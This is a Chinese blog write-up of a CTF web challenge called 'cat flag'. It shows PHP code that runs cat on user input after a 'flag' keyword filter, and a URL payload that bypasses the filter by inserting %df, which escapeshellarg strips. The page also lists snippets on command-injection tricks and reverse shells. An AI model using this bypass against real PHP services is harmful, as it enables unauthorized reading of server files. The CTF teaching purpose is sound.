cat flag

最新推荐文章于 2024-04-16 02:14:12 发布
最新推荐文章于 2024-04-16 02:14:12 发布
阅读量919 收藏
点赞数 2
分类专栏: 2021DASCTF July X CBCTF WP 文章标签: php
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/lastwinn/article/details/119303506
版权

cat flag

<?php
​
if (isset($_GET['cmd'])) {
    $cmd = $_GET['cmd'];
    if (!preg_match('/flag/i',$cmd))
    {
        $cmd = escapeshellarg($cmd);
        system('cat ' . $cmd);
    }
} else {
    highlight_file(__FILE__);
}
?>

题目给了一点点代码,对cmd参数进行匹配,不能存在flag字符串。

执行cat命令,查看他的日志;

?cmd=/var/log/nginx/access.log

发现this_is_final_flag_e2a457126032b42d.php文件,也就是我们要查看这个文件,但是这里存在flag字符串,所以没法直接输入。

由于escapeshellarg函数会忽略ascll大于127的字符,所以我们构造payload

?cmd=this_is_final_fla%dfg_e2a457126032b42d.php

由于%df的存在通过了preg_match函数,然后经过escapeshellarg函数的时候%df又被忽略,这样就成功绕过了。

angelkat
关注
  • 2
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
CATCTF_Misc
Welcome To Myon'Blog !
02-24 2845
CATCTF_Misc 1、Nepnep 祝你新年快乐啦! 2、CatFlag 3、CatchCat 4、CatCatCat; linux下的cattype、strings命令; GPS数据流; rabbit加密和base91编码
xctf攻防世界 MISC之CatFlag
l8947943的博客
09-06 7191
拿到的是一个无后缀的flag文件,用winhex打开后发现是奇奇怪怪的乱码,用kali的strings搜索也没找到flag情况。
【攻防世界misc】CatFlag_攻防世界catflag(1),2024年网络安全开发前景如何
最新发布
2401_83974412的博客
04-16 776
当我学到一定基础,有自己的理解能力的时候,会去阅读一些前辈整理的书籍或者手写的笔记资料,这些笔记详细记载了他们对一些技术点的理解,这些理解是比较独到,可以学到不一样的思路。网安所有方向的技术点做的整理,形成各个领域的知识点汇总,它的用处就在于,你可以按照上面的知识点去找对应的学习资源,保证自己学得较为全面。观看零基础学习视频,看视频学习是最快捷也是最有效果的方式,跟着视频中老师的思路,从基础到深入,还是很容易入门的。2.不过嘛,做完这道题得回头想想,在hex中右侧频繁出现[C [D是什么意思?
CTF 每日一题 Day11
ChaoYue_miku的博客
01-11 256
题目名称:RSA 题目类型:Crypto 题目来源:BUUCTF 题目描述
【攻防世界misc】CatFlag
ncnfjdjjd的博客
01-22 945
光标移动
catflag套神的传人
zip471642048的博客
12-18 1308
题目是一个套了400多层的压缩包,仔细观察就可以发现压缩包的名称是16进制,我们先使用脚本把压缩包递归解压。 import zipfile import os file_path = input('path : ')#压缩包路径 path = file_path[0:len(file_path)-len(file_path.split('\\')[-1])] n = 0 s2 = "" #"C:\Users\63606\Desktop\CTF\CTF\VFree\MISC\secret\272B3B797
攻防世界Misc题CatFlag的flag文件
06-12
攻防世界Misc题CatFlag的flag文件
AWD攻防中读取flag的批量脚本
09-05
AWD攻防中读取flag的批量脚本,可能需要自行修改下
攻防世界Wire1杂项
11-20
攻防世界Wire1杂项,misc。 此题详细解题博客:https://danbaku.blog.csdn.net/article/details/127951997
flag:解析标志,环境变量和配置文件
04-23
使用地鼠的示例: $ cat > gopher . go package main import ( "fmt" "github.com/namsral/flag") func main () { var age intflag . IntVar ( & age , "age" , 0 , "age of gopher" )flag . Parse ()fmt . Print ...
arduino-esp8266-hue-color-pulse:基于ArduinoESP8266的Philips Hue换色器。 :rainbow_flag::grinning_cat:
04-29
ESP8266飞利浦Hue换色器 此代码通过Hue色彩空间使单个Philips Hue灯光缓慢变暗。 如何 安装 克隆此仓库 使用PlatformIO IDE打开 创建自己src/config.h的src/config.h.example 刷到esp8266 插入USB端口/电源组
catflag-web-wp部分(填坑)
开心星人的博客
03-25 4822
目录web签到题webshell命令执行之我在哪int命令执行《我的女友是机器人》变量覆盖_extract等于False文件包含strcmp什么?有后门命令执行之我是谁小矛盾命令执行之我在干什么 web签到题 进入页面,一片空白,查看源码 webshell 源码,状态包什么都看了,没找到 啥都没了,猜猜应该是目录扫描 扫一下 webshe11.php是白板,查看源码得到 解码得到hacker 应该是一句话木马的密码 cat看一下,没有找着(可以直接用菜刀连) 查看根目录 有了 命令执行之我在哪
绕过之cat|/ flag
m0_61011147的博客
09-06 1924
绕过之cat|/ flag
CatFlag
qq_53229503的博客
01-31 1282
本题方向为Misc——GFSJ1208,难度偏简单 来源地址:攻防世界(https://adworld.xctf.org.cn/challenges/list)
攻防世界-CatFlag-.删库跑路-[简单] 凯撒大帝在培根里藏了什么-[简单] 简单的base编码-misc1-流量分析2
lin__ying的博客
11-26 707
CatFlag-.删库跑路-[简单] 凯撒大帝在培根里藏了什么-[简单] 简单的base编码-misc1-流量分析2
CTF命令执行的常见姿势
weixin_40103894的博客
09-28 1475
1.**cat fl[abc]g.php ** //匹配[abc]中的任何一个。11.**vi **–使用vi打开文本cat 由第一行开始显示内容,并将所有内容输出。1.**wh\o\ami ** //反斜线绕过。3.**cat fla* ** //用*匹配任意。3.**whoa’m’i ** //单引号绕过。4.**whoam``i ** //反引号绕过。8.**nl **–类似于cat -n,显示时输出行号。
CTFHub-web(RCE)
qq_49502930的博客
12-08 946
文章目录eval执行文件包含php://input eval执行 打开关卡 意思是判断cmd是否被设置,若cmd被赋值,则执行如下语句,否则就继续显示以上代码。 我们先在url后输入 ?cmd=system("ls"); 查看根目录 然后输入 ?cmd=system("ls /"); 返回上一级 flag很显眼然后输入 ?cmd=system("cat /文件名"); 得到flag 文件包含 我们打开关卡 有个shell按钮,我们点击 这里使用火狐Hacker插件发现里面有个ctfhub变量,我
反弹shell以及常见的反弹Shell语句原理
计算机毕业论文源码,学生个人网页制作html源码。贴近用户做网络推广和互联网优化。
10-31 475
什么是反弹shell?原词为reverse shell,含义如下 控制端监听在某TCP/UDP端口,被控端发起请求到该端口,并将其命令行的输入输出转到控制端。 其本质就是实现客户端与服务端的互换 反弹shell利用原因 初学时我们不禁有这样的疑问,为什么我们要用反弹shell呢?我们时候利用反弹shell呢?解释如下 为什么要用反弹shell 这里不以CTF举例,以相对更真实一点的渗透过程来举例,比如你作为攻击方,成功向目标处上传了木马文件,可以执行一些语句,我们想获取一个可以直接操作主机的虚拟终端,这个时
$ system("cat flag.txt") sh: 1: Syntax error: word unexpected (expecting ")")
05-14
- 在当前目录下输入命令 cat flag.txt - 使用文本编辑器打开该文件,例如 vim flag.txt 或 nano flag.txt - 使用 more 或 less 命令以分页的形式查看文件内容,例如 more flag.txt 或 less flag.txt 请注意,获取 ...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值